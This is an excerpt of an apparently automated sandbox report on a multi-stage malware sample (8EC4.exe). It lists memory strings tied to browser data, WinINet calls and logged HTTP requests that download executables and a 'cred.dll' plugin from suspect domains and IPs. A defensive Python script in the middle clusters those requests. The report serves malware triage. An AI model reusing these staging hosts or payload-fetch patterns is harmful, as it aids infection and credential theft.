Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8EC4.exe, 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,HeapCreate,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
Source: global traffic | HTTP traffic detected: GET /3.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET /45512.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /advert.msi HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /File.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /123.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /442.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /512412.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /443.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /RM.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
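The request records above come from more than one HTTP client: some carry the IE11-style User-Agent with Connection: Keep-Alive, some send only a Host header, some send Host plus Accept: */*, and two send Cache-Control/Pragma: no-cache. In a multi-stage sample like this one, a distinct header set usually means a distinct downloader component, so clustering requests by header names and order is a quicker first cut than attributing URLs one by one. The script below is an added triage example written for this page (not Joe Sandbox output); the nine requests are rebuilt from the records above, on the assumption that the report prints headers in wire order.

```python
"""Cluster sandbox HTTP request records by header fingerprint and flag payload fetches.

Added example for this report, not part of the Joe Sandbox output.
"""
import ipaddress
from collections import defaultdict

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Constructed input: nine of the requests listed above, rebuilt as raw HTTP/1.1 text.
SAMPLE_REQUESTS = [
    "GET /files/9030_1641816409_7037.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {IE11_UA}\r\nHost: data-host-coin-8.com\r\n\r\n",
    "GET /install5.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {IE11_UA}\r\nHost: unicupload.top\r\n\r\n",
    "GET /6.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {IE11_UA}\r\nHost: 185.7.214.171:8080\r\n\r\n",
    "GET /9.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {IE11_UA}\r\nHost: a0621298.xsph.ru\r\n\r\n",
    "GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1\r\nHost: 185.215.113.35\r\n\r\n",
    "GET /3.exe HTTP/1.1\r\nHost: a0621298.xsph.ru\r\nAccept: */*\r\n\r\n",
    "GET /capibar HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nContent-Type: text/plain; charset=UTF-8\r\nHost: 185.163.204.22\r\n\r\n",
    "GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nHost: 185.163.204.24\r\n\r\n",
    "GET /advert.msi HTTP/1.1\r\nHost: a0621298.xsph.ru\r\nAccept: */*\r\n\r\n",
]

PAYLOAD_EXT = (".exe", ".dll", ".msi")


def parse_request(raw: str) -> dict:
    """Parse one raw HTTP/1.1 request head (request line + CRLF-separated headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = []                                   # keep wire order for fingerprinting
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
    hdrs = dict(headers)
    return {"method": method, "path": path, "version": version, "headers": headers,
            "host": hdrs.get("host", ""), "user_agent": hdrs.get("user-agent", "")}


def header_fingerprint(req: dict) -> tuple:
    """Header names in the order sent; different clients produce different tuples."""
    return tuple(name for name, _ in req["headers"])


def is_ip_host(host: str) -> bool:
    """True if the Host value is a bare IPv4/IPv6 literal (an optional :port is stripped)."""
    hostname = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(hostname)
        return True
    except ValueError:
        return False


def url_of(req: dict) -> str:
    return f"http://{req['host']}{req['path']}"


def triage(raw_requests) -> dict:
    """Group requests by header fingerprint and pull out the indicators worth a second look."""
    reqs = [parse_request(r) for r in raw_requests]
    clusters = defaultdict(list)
    for r in reqs:
        clusters[header_fingerprint(r)].append(url_of(r))
    return {
        "clusters": dict(clusters),
        # executables fetched over cleartext HTTP: the next-stage payload URLs
        "payload_urls": [url_of(r) for r in reqs
                         if r["path"].split("?")[0].lower().endswith(PAYLOAD_EXT)],
        # bare-IP hosts need no DNS and so leave no DNS telemetry to hunt on
        "ip_hosts": sorted({r["host"] for r in reqs if is_ip_host(r["host"])}),
        # no User-Agent at all is itself a fingerprint of a hand-rolled client
        "no_user_agent": [url_of(r) for r in reqs if not r["user_agent"]],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_REQUESTS)
    for fp, urls in result["clusters"].items():
        print(" + ".join(fp), "->", len(urls), "request(s)")
    for key in ("payload_urls", "ip_hosts", "no_user_agent"):
        print(key, result[key])
```

On the nine sampled requests the script separates five header fingerprints, six payload-extension fetches and four bare-IP hosts; running it over the full list above gives the same five clusters. The fingerprint alone does not prove which binary sent each request, but it tells you which records to pair with which process in the sandbox's process tree.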
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown | Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown | Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 19 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 19{i+,GO0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2dI:82OI:J_J-WS,/0
